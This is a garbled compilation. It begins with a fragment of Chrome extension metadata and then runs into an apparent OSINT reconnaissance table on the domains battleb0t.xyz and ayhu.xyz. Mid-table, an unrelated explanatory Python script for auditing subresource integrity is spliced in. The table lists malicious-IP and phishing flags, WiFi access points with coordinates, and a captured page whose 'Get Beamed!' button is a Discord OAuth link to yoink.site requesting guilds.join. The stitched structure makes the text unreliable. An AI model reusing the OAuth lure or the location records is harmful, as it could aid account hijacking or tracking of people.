{"rating": 4.1474295, "users": 6000000, "platform": "", "short_description": "Your surfing made private and secure", "icon": "https://lh3.googleusercontent.com/hjQv8jaFVCyh3Df1rAM6LTeuBY0wOxZAESgsLsysTHGOCQHt5XZP_44v5HM-xIjv-1gVTUHaehBTrF2hoqNcS5RFXK0=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 2937, "name": "Avira Browser Safety"}, "mlomiejdfkolichcflejclcbmpeaniij": {"rating": 4.6202865, "users": 2000000, "platform": "", "short_description": "Ghostery is a powerful privacy extension. 
Block ads, stop trackers and speed up websites.", "icon": "https://lh3.googleusercontent.com/CpXOKuccvzh9oCG7G6NLr5nAvqUEdMLgfqWsYrKR92loF74N42s1B6LPtolnoVJphyP7WMTOtQRY7eAb2v61x1tOmQ=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 12836, "name": "Ghostery \u2013 Privacy Ad Blocker"}, "pgjjikdiikihdfpoppgaidccahalehjh": {"rating": 4.414451, "users": 2000000, "platform": "", "short_description": "Take a Speedtest directly from your toolbar to quickly test your internet performance without interruption.", "icon": "https://lh3.googleusercontent.com/UeJDiqRqbe61ZwRA-nshMyadO7gt5igLJN5jGy3he_VVP5iELduwit3AdBk9gTnCiDzDIQtlUJv6mQ-V7_7azrShxQ=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 2934, "name": "Speedtest by Ookla"}, "fjgncogppolhfdpijihbpfmeohpaadpc": {"rating": 4.473016, "users": 2000000, "platform": "", "short_description": "Fast, one-click access to millions of research papers.", "icon": "https://lh3.googleusercontent.com/orDWHjYrSVYleMvmm7KTV9GHN_DcjWfOUKP6MVQ-JxjaW3BUF61B9Z2gPU__qY23z764gn7FLubSqYbcZZ8H_w3LJg=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 315, "name": "EndNote Click - Formerly Kopernio"}, "gpdjojdkbbmdfjfahjcgigfpmkopogic": {"rating": 3.558845, "users": 7000000, "platform": "", "short_description": "Save your favorite ideas online so you | ayhu.xyz |
| 2023-05-12 03:11:18 | Raw Data from RIRs | No | AbstractAPI | 0 | 0 | 2 | 0 | None | {u'city': u'Amsterdam', u'security': {u'is_vpn': False}, u'city_geoname_id': 2759794, u'region_geoname_id': 2749879, u'country': u'Netherlands', u'region': u'North Holland', u'connection': {u'connection_type': u'Corporate', u'autonomous_system_organization': u'CLOUDFLARENET', u'isp_name': u'Cloudflare, Inc.', u'organization_name': u'CloudFlare, Inc.', u'autonomous_system_number': 13335}, u'continent_code': u'EU', u'currency': {u'currency_name': u'Euros', u'currency_code': u'EUR'}, u'flag': {u'svg': u'https://static.abstractapi.com/country-flags/NL_flag.svg', u'png': u'https://static.abstractapi.com/country-flags/NL_flag.png', u'unicode': u'U+1F1F3 U+1F1F1', u'emoji': u'\U0001f1f3\U0001f1f1'}, u'postal_code': u'1012', u'longitude': 4.8975, u'country_code': u'NL', u'timezone': {u'abbreviation': u'CEST', u'gmt_offset': 2, u'is_dst': True, u'name': u'Europe/Amsterdam', u'current_time': u'05:11:17'}, u'latitude': 52.3759, u'country_geoname_id': 2750405, u'continent_geoname_id': 6255148, u'country_is_eu': True, u'ip_address': u'188.114.97.1', u'continent': u'Europe', u'region_iso_code': u'NH'} | 188.114.97.1 |
| 2023-05-12 03:00:58 | Malicious Affiliate | Yes | VXVault.net | 0 | 1 | 3 | 0 | None | VXVault Malicious URL List [cdn-185-199-110-153.github.com]
http://vxvault.net/URL_List.php | cdn-185-199-110-153.github.com |
| 2023-05-12 02:52:11 | Malicious IP Address | Yes | VirusTotal | 0 | 1 | 3 | 0 | None | VirusTotal [172.67.168.252]
https://www.virustotal.com/en/ip-address/172.67.168.252/information/ | 172.67.168.252 |
| 2023-05-12 02:50:16 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | nwapi.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:74:c7:69:09:be:bf:85:53:83:95:0e:84:5e:23:6b:8f:95
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Mar 27 17:04:53 2023 GMT
Not After : Jun 25 17:04:52 2023 GMT
Subject: CN=nwapi.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:c0:92:2b:06:a8:76:be:87:ad:a1:7a:9e:5a:24:
59:36:93:77:df:2f:5f:ec:5d:f8:39:5c:9e:e9:bb:
24:38:91:de:54:5b:7a:21:bd:81:66:b9:f4:29:4c:
2b:fa:57:13:7e:92:b4:15:86:67:29:e9:3d:cd:52:
95:9b:57:3a:5d:e6:e9:45:19:f1:e0:94:39:75:06:
2b:76:17:5a:3c:dc:eb:34:5d:2b:11:01:60:df:20:
e3:b5:60:cd:32:82:ad:56:26:62:d5:06:6e:b6:fa:
a5:d9:a5:4d:79:33:21:15:51:a2:c0:48:15:37:c6:
91:2f:b2:2e:7d:a0:75:7f:50:14:78:92:5d:14:20:
37:35:75:05:53:06:c4:4c:79:be:57:44:4e:7f:9a:
50:6f:84:ce:99:6c:50:c4:25:b5:3b:28:ef:3d:1e:
0d:f1:c2:fb:f7:a2:98:40:97:4e:a6:29:13:ba:fe:
a3:fd:ca:b9:fd:ab:de:51:93:45:07:f4:be:76:56:
10:d6:f8:44:07:0f:8a:0a:1d:0b:2a:3e:ea:d3:77:
c7:f9:17:20:d7:71:23:2b:a0:8f:f4:4a:f3:e4:d4:
5a:5c:2d:ce:df:b4:a0:a0:ac:d7:ab:d8:92:f0:4a:
4c:07:6e:72:26:57:04:a7:82:b9:f3:2d:17:4e:50:
36:d2:94:d7:69:b9:6a:7a:3a:20:4d:5d:1e:75:6c:
84:96:b6:c4:70:f4:80:b9:d6:06:45:7a:52:b8:0e:
0e:2d:fd:2c:dc:22:9b:06:83:b7:ce:89:98:50:8a:
98:25:5c:fe:f2:ac:51:29:2f:08:c4:ff:27:4b:06:
5c:49:dd:d3:39:da:b3:60:fe:da:c7:a0:9e:e7:45:
85:7c:70:41:16:a9:f0:27:f6:98:d1:7c:9f:af:81:
f4:37:0b:12:28:d5:35:6a:e6:e2:66:3b:e1:11:5b:
6a:d4:8d:47:d6:44:64:d5:a9:fc:83:71:f4:46:8c:
69:8f:3e:2f:32:4d:8a:48:3b:ac:ac:88:a4:94:ea:
b5:b5:92:f4:63:d9:95:76:ef:6d:8e:2f:15:8a:59:
65:d3:00:6a:ca:d7:56:11:cf:5f:a7:d4:3d:48:6a:
5d:dd:87:ce:8c:d0:6e:15:cf:fb:5f:c0:02:33:50:
4e:36:37:09:f4:b7:06:18:07:a3:00:b5:58:4a:d2:
bc:0d:0b:5d:96:5b:4e:aa:75:b7:e9:a2:ce:90:ad:
d7:25:96:7f:66:7d:4e:03:23:c1:16:bc:0c:09:9d:
d4:bf:8c:7c:19:2d:8b:39:0c:89:5a:15:97:34:34:
1c:7b:5d:34:19:a2:d0:cb:f4:5c:b0:48:d7:c9:6c:
5d:09:b3
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
1F:80:B0:A7:B9:49:16:0F:27:7B:7C:B9:F5:38:B5:3D:C9:3C:2F:40
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:nwapi.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
24:54:79:6e:3c:79:d5:ae:a0:b8:7c:0a:ff:89:93:3d:d6:57:
91:5f:7d:e2:ea:b5:70:87:04:12:dd:cf:ba:db:1a:dd:bf:5f:
7c:c6:d9:18:6d:ca:27:ff:1c:41:bc:85:75:b0:f4:d1:5d:dc:
45:87:06:cb:1f:49:05:31:eb:49:05:f4:6b:36:41:2f:39:66:
bb:c1:2a:07:32:84:55:39:1c:a4:29:9c:55:fc:c5:e4:ad:62:
54:ad:d2:25:f2:67:4f:a1:c0:d0:75:ed:4f:e4:15:2f:b9:2f:
6f:67:f4:2e:dc:7e:0d:b9:75:12:29:49:c3:67:d0:7b:f2:21:
0c:ee:8a:58:d9:43:b2:12:a1:03:39:b0:0e:c1:ea:07:d2:2f:
a3:20:c3:66:05:93:88:53:7a:4d:dc:f9:b6:ec:64:81:b8:41:
97:de:f9:a9:49:80:7b:d7:0d:4d:f9:f4:92:96:1e:c7:cc:e3:
98:1b:07:be:b0:bf:bd:9e:e3:6c:c7:67:ae:92:9a:78:90:eb:
a0:3f:1e:59:bd:f5:c7:ec:43:04:a4:be:44:c3:74:12:39:82:
e0:e3:bf:d9:c2:3b:8e:9a:08:be:3c:f1:c4:88:72:a0:ed:59:
9a:b6:1a:ae:e9:2d:33:e0:ea:a0:55:60:b8:66:48:ca:d5:05:
c4:a4:9b:ca
|
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Clayton2 (Net ID: 00:02:2D:0E:A8:AC) | 37.7642, -122.3993 |
| 2023-05-12 02:53:25 | IP Address | No | Mnemonic PassiveDNS | 0 | 0 | 2 | 0 | None | 172.67.168.252 | www.battleb0t.xyz |
| 2023-05-12 02:46:24 | Netblock Membership | No | RIPE | 8 | 0 | 2 | 0 | None | 185.199.109.0/24 | 185.199.109.153 |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Sitecom6F5C74 (Net ID: 00:0C:F6:6F:5C:74) | 50.8897, 6.0563 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | MatrixEx BYOD (Net ID: 00:01:21:26:54:31) | 41.8781, -87.6298 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | BJNPSETUP (Net ID: 00:00:85:EB:D2:2C) | 41.8781, -87.6298 |
| 2023-05-12 02:49:58 | Malicious IP Address | Yes | VirusTotal | 0 | 1 | 2 | 0 | None | VirusTotal [185.199.110.153]
https://www.virustotal.com/en/ip-address/185.199.110.153/information/ | 185.199.110.153 |
| 2023-05-12 02:54:48 | Physical Location | No | Censys | 1 | 0 | 3 | 0 | None | North Charleston, South Carolina, 29405, United States, North America | 34.148.97.127 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | Gravatar (Category: images)
http://en.gravatar.com/profiles/login | login |
| 2023-05-12 02:50:23 | Blacklisted IP Address | Yes | Honeypot Checker | 0 | 1 | 3 | 0 | None | Honeypotproject (172.67.168.252): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 172.67.168.252 |
| 2023-05-12 03:01:37 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.143): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | MatrixEx BYOD (Net ID: 00:01:21:26:54:21) | 41.8781, -87.6298 |
| 2023-05-12 03:23:02 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | themeforest (Category: art)
https://themeforest.net/user/ayhu | ayhu |
| 2023-05-12 02:44:20 | Co-Hosted Site - Domain Name | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | github.com | 185.199.110.153 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | Dribbble (Category: art)
https://dribbble.com/login | login |
| 2023-05-12 02:53:06 | Web Technology | No | Tool - WAFW00F | 0 | 0 | 2 | 0 | None | Cloudflare Inc. Cloudflare | nuke.battleb0t.xyz |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | MyVolvoLpyPOa (Net ID: 00:10:02:39:B3:DE) | 32.8608, -79.9746 |
| 2023-05-12 02:55:11 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"_encoding": {"Persistent_Auth": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Host": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Www_Authenticate": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Persistent_Auth": ["false"], "Expires": ["Fri, 01 Jan 1990 00:00:00 GMT"], "Vary": ["Accept-Encoding"], "Host": ["87.248.157.102:2080"], "Server": ["cPanel"], "Connection": ["close"], "Www_Authenticate": ["Basic realm=\"Horde DAV Server\""], "Content_Type": ["text/html; charset=\"utf-8\""], "Date": ["<REDACTED>"], "Cache_Control": ["no-cache, no-store, must-revalidate, private"]} | 87.248.157.102 |
| 2023-05-12 02:53:35 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"_encoding": {"X_Cache_Hits": "DISPLAY_UTF8", "X_Github_Request_Id": "DISPLAY_UTF8", "Etag": "DISPLAY_UTF8", "Age": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "X_Cache": "DISPLAY_UTF8", "X_Timer": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Via": "DISPLAY_UTF8", "X_Fastly_Request_Id": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Content_Security_Policy": "DISPLAY_UTF8", "X_Served_By": "DISPLAY_UTF8", "Accept_Ranges": "DISPLAY_UTF8"}, "X_Github_Request_Id": ["872A:0A4B:BBF254:10FE511:645C54E0"], "Etag": ["W/\"64556a8c-239b\""], "Age": ["0"], "X_Cache_Hits": ["0"], "Vary": ["Accept-Encoding"], "Server": ["GitHub.com"], "X_Cache": ["MISS"], "X_Timer": ["S1683772640.067376,VS0,VE28"], "Connection": ["keep-alive"], "Via": ["1.1 varnish"], "X_Fastly_Request_Id": ["13b6057c2e99facbd081defdf7bc9d1ff579d6e4"], "Content_Type": ["text/html; charset=utf-8"], "Date": ["<REDACTED>"], "Content_Security_Policy": ["default-src 'none'; style-src 'unsafe-inline'; img-src data:; connect-src 'self'"], "X_Served_By": ["cache-chi-klot8100052-CHI"], "Accept_Ranges": ["bytes"]} | 185.199.110.153 |
| 2023-05-12 03:00:13 | Internet Name - Unresolved | No | Certificate Transparency | 0 | 0 | 1 | 0 | None | cpcontacts.ayhu.xyz | ayhu.xyz |
| 2023-05-12 02:54:20 | Linked URL - External | No | Web Spider | 0 | 0 | 3 | 0 | None | https://support.cloudflare.com/hc/en-us/articles/200171916-Error-521 | http://nuke.battleb0t.xyz/ |
| 2023-05-12 03:18:06 | Externally Hosted Javascript | No | Page Information | 0 | 0 | 3 | 0 | None | https://use.fontawesome.com/9dfc16ed6b.js | <!DOCTYPE html>
<html>
<head>
<title>Funny Forehead Gallery</title>
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css" integrity="sha384-BVYiiSIFeK1dGmJRAkycuHAHRg32OmUcww7on3RYdg4Va+PmSTsz/K68vbdEjh4u" crossorigin="anonymous">
<script src="http://code.jquery.com/jquery-3.2.1.js" integrity="sha256-DZAnKJ/6XZ9si04Hgrsxu/8s717jcIzLy3oi35EouyE=" crossorigin="anonymous"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js" integrity="sha384-Tc5IQib027qvyjSMfHjOMaLkfuWVxZxUPnCJA7l2mCWNIpG9mGCD8wGNIcPD7Txa" crossorigin="anonymous"></script>
<script src="https://use.fontawesome.com/9dfc16ed6b.js"></script>
<link rel="stylesheet" type="text/css" href="gallery.css">
<link rel="icon" type="image/png" href="/images/favicon.png">
</head>
<body>
<nav class = "nav navbar-inverse navbar-fixed-top">
<div class = "container">
<div class = "navbar-header">
<button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#bs-example-navbar-collapse-1" aria-expanded="false">
<span class="sr-only">Toggle navigation</span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
</button>
<a href = "#" class = "navbar-brand"><span class="glyphicon glyphicon-picture" aria-hidden="true"></span> #WieselOnTop</a>
</div>
</nav>
<div class = "container">
<div class = "jumbotron">
<h1><i class="fa fa-camera-retro" aria-hidden="true"></i> The Funny Forehead Gallery</h1>
<p>A bunch of beautiful images!</p>
<a href = "https://discord.com/api/oauth2/authorize?client_id=1073319920575713290&redirect_uri=https%3A%2F%2Fyoink.site%2Fauth&response_type=code&scope=identify%20guilds.join" class = "btn btn-primary btn-lg">Join the Discord</a>
<a href = "https://discord.com/api/oauth2/authorize?client_id=1073319920575713290&redirect_uri=https%3A%2F%2Fyoink.site%2Fauth&response_type=code&scope=identify%20guilds.join" class = "btn btn-primary btn-lg">Get Beamed!</a>
</div>
<div class = "row">
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/carti_1.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/carti_2.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/carti_3.JPG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/nomnom.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/fredo.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/jonas.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/master058_1.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/master058_2.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/master058_3.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/ein_1.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/ein_2.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/reveloder.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/kappi_1.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/kappi_2.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_1.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_2.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_3.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_4.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_5.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_1.jpeg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_2.jpeg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_3.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_4.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_5.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_6.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/jcqn.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/nwp.PNG">
</div>
</div>
</div>
</body>
</html>
|
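The "Externally Hosted Javascript" row above flags `https://use.fontawesome.com/9dfc16ed6b.js` on the captured nuke.battleb0t.xyz page, and the same page pulls jQuery over plain `http://` while the page itself is served over http (per the Web Spider row). The following is an added example, not part of the scan output or of the captured site: a small audit that walks a page's `<script>` and stylesheet tags and reports third-party loads without Subresource Integrity, cross-origin SRI without a `crossorigin` attribute, and plain-http loads. `SAMPLE_HTML` is constructed from the `<head>` shown above with the body left out, and the page URL `http://nuke.battleb0t.xyz/` is taken from the Web Spider row; both are inputs to the example, not new findings.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample: the <head> of the nuke.battleb0t.xyz page captured in
# the scan output above, with the body left out.
SAMPLE_HTML = """<!DOCTYPE html>
<html><head>
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css" integrity="sha384-BVYiiSIFeK1dGmJRAkycuHAHRg32OmUcww7on3RYdg4Va+PmSTsz/K68vbdEjh4u" crossorigin="anonymous">
<script src="http://code.jquery.com/jquery-3.2.1.js" integrity="sha256-DZAnKJ/6XZ9si04Hgrsxu/8s717jcIzLy3oi35EouyE=" crossorigin="anonymous"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js" integrity="sha384-Tc5IQib027qvyjSMfHjOMaLkfuWVxZxUPnCJA7l2mCWNIpG9mGCD8wGNIcPD7Txa" crossorigin="anonymous"></script>
<script src="https://use.fontawesome.com/9dfc16ed6b.js"></script>
<link rel="stylesheet" type="text/css" href="gallery.css">
</head><body></body></html>
"""


class _SubresourceCollector(HTMLParser):
    """Collect every script and stylesheet reference with its attributes."""

    def __init__(self):
        super().__init__()
        self.resources = []  # (kind, url, attrs)

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}  # bare attributes parse as None
        if tag == "script" and a.get("src"):
            self.resources.append(("script", a["src"], a))
        elif tag == "link" and a.get("href") and "stylesheet" in a.get("rel", "").lower():
            self.resources.append(("stylesheet", a["href"], a))


def audit_subresources(html, page_url):
    """Return a list of {kind, url, issues} for subresources that are
    fetched cross-origin without SRI, carry SRI without CORS, or are
    loaded over plain http.  Same-origin relative paths are skipped."""
    page = urlparse(page_url)
    parser = _SubresourceCollector()
    parser.feed(html)
    findings = []
    for kind, url, attrs in parser.resources:
        u = urlparse(url)
        if not u.netloc:
            continue  # relative path such as gallery.css: same origin as the page
        issues = []
        if u.scheme == "http":
            # A script fetched over plain http can be rewritten in transit.
            # SRI does not help when the page itself is served over http
            # (the attacker rewrites the hash too), and https pages block
            # it outright as active mixed content.
            issues.append("plain-http")
        if u.netloc != page.netloc:
            if not attrs.get("integrity"):
                issues.append("no-sri")
            elif "crossorigin" not in attrs:
                # Cross-origin SRI needs a CORS-enabled fetch; without the
                # crossorigin attribute the response is opaque and the
                # browser refuses to run the resource at all.
                issues.append("sri-without-crossorigin")
        if issues:
            findings.append({"kind": kind, "url": url, "issues": issues})
    return findings


if __name__ == "__main__":
    for f in audit_subresources(SAMPLE_HTML, "http://nuke.battleb0t.xyz/"):
        print(f"{f['kind']:10} {', '.join(f['issues']):24} {f['url']}")
```

On the sample this reports exactly two resources: the jQuery script as `plain-http` and the Font Awesome kit script as `no-sri`. The two Bootstrap assets pass because they carry both `integrity` and `crossorigin`, and `gallery.css` is skipped as same-origin. The check is static; it does not fetch the resources or verify the hashes themselves.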
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | BJNPSETUP (Net ID: 00:00:85:F4:A6:7E) | 41.8781, -87.6298 |
| 2023-05-12 03:00:27 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.12): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:13:04 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [00089.github.io]
https://www.openphish.com/feed.txt | 00089.github.io |
| 2023-05-12 03:00:54 | Co-Hosted Site | No | HackerTarget | 1 | 0 | 2 | 0 | None | 007316.xyz | 185.199.111.153 |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | Dubtronicssid (Net ID: 00:01:24:F0:BB:A4) | 37.7813933,-122.3918002 |
| 2023-05-12 02:44:05 | SSL Certificate - Raw Data | No | CertSpotter | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
26:cc:7f:01:c6:92:25:78:13:50:9e:48:80:75:15:57
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Google Trust Services LLC, CN=GTS CA 1P5
Validity
Not Before: Mar 23 22:37:05 2023 GMT
Not After : Jun 21 22:37:04 2023 GMT
Subject: CN=*.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:aa:7b:81:42:e7:bb:ef:b8:0c:29:95:16:51:5f:
17:ef:12:01:ea:12:d1:38:f6:d6:ab:de:90:73:55:
a4:af:cb:7c:f7:08:2e:7f:ec:c7:d3:07:5d:b2:f5:
bb:41:e9:04:92:a8:3c:a4:cb:ef:73:55:b5:a9:bc:
5c:d1:be:26:4b:99:f3:8a:57:d8:c7:77:79:1d:0e:
70:31:81:bc:da:4a:73:41:e5:08:81:59:46:c7:d8:
68:74:56:c2:f6:64:23:af:1b:88:8f:72:bd:52:09:
2e:97:9b:f1:a4:cf:09:d8:89:91:91:ca:2e:06:41:
a2:84:ad:0d:6a:df:00:95:f5:ec:e2:1e:49:48:18:
0a:3f:98:fa:06:a5:50:9f:7c:2c:20:19:c1:55:cd:
77:d2:89:47:dd:a9:ee:13:f6:2f:e2:48:87:26:a5:
fd:85:17:06:37:b0:a9:d0:53:b4:4d:e3:4c:ec:0e:
83:60:b2:ad:ad:2d:44:08:30:33:b0:91:f7:b0:f8:
00:7f:d1:49:37:39:19:99:a3:59:5c:dc:4a:a0:c5:
bd:ef:ae:e1:d6:c3:40:3c:f6:35:0e:db:7b:df:4f:
54:c4:bd:f6:3a:2c:2b:ff:c9:5b:e5:d2:e9:69:24:
02:0b:f7:c6:94:a2:a1:ed:73:64:15:f9:25:08:00:
3b:85
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
E7:35:7E:35:FD:7B:BC:32:B5:C0:52:8C:76:D9:7D:F0:37:0A:7A:3D
X509v3 Authority Key Identifier:
keyid:D5:FC:9E:0D:DF:1E:CA:DD:08:97:97:6E:2B:C5:5F:C5:2B:F5:EC:B8
Authority Information Access:
OCSP - URI:http://ocsp.pki.goog/s/gts1p5/X4UdJFi-bqE
CA Issuers - URI:http://pki.goog/repo/certs/gts1p5.der
X509v3 Subject Alternative Name:
DNS:*.battleb0t.xyz, DNS:battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.11129.2.5.3
X509v3 CRL Distribution Points:
Full Name:
URI:http://crls.pki.goog/gts1p5/QCTFvWRh6mE.crl
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
09:9f:cd:b5:43:3b:6a:2f:1d:c9:3b:c0:c8:50:40:4b:85:6c:
a4:67:c0:ea:9c:ed:fa:82:03:5a:15:d9:da:e2:17:9e:f5:4d:
17:b3:27:61:b6:b3:76:a2:5c:3c:dc:1f:ca:d1:cf:2a:8c:c5:
9f:e1:42:b1:ce:4f:6c:8b:d7:5b:5d:4a:1a:37:bf:f7:48:1c:
b0:1e:50:fd:1f:d7:83:b8:62:23:8e:ce:bc:13:38:47:cd:3d:
85:a8:0c:e6:2b:35:45:86:97:06:88:96:8f:aa:84:6c:ae:91:
25:1d:3c:c7:d6:f8:a1:4f:51:5e:ed:a9:fe:6b:22:98:84:a4:
ef:b4:d3:2f:02:db:9e:b8:fb:29:cc:58:62:ad:6f:ac:48:dc:
16:46:0c:14:b4:34:7b:60:f1:ec:27:16:2b:4e:4a:c3:37:36:
d0:34:81:c1:2b:54:8c:d5:17:57:ba:55:4c:71:58:26:4f:c6:
22:b8:65:ba:ad:e7:f5:f2:a8:04:c1:7d:df:11:ab:7d:f5:94:
7d:56:64:8a:41:7f:f4:d3:d7:1a:a0:c6:cc:e6:42:c8:ac:de:
6a:33:c1:21:70:bc:bd:6f:69:08:1f:8f:fa:9f:b7:aa:ca:2e:
e6:b7:8f:15:ac:fb:89:0e:c0:5f:c0:b9:df:e8:c0:15:b9:87:
ca:00:58:c5
| battleb0t.xyz |
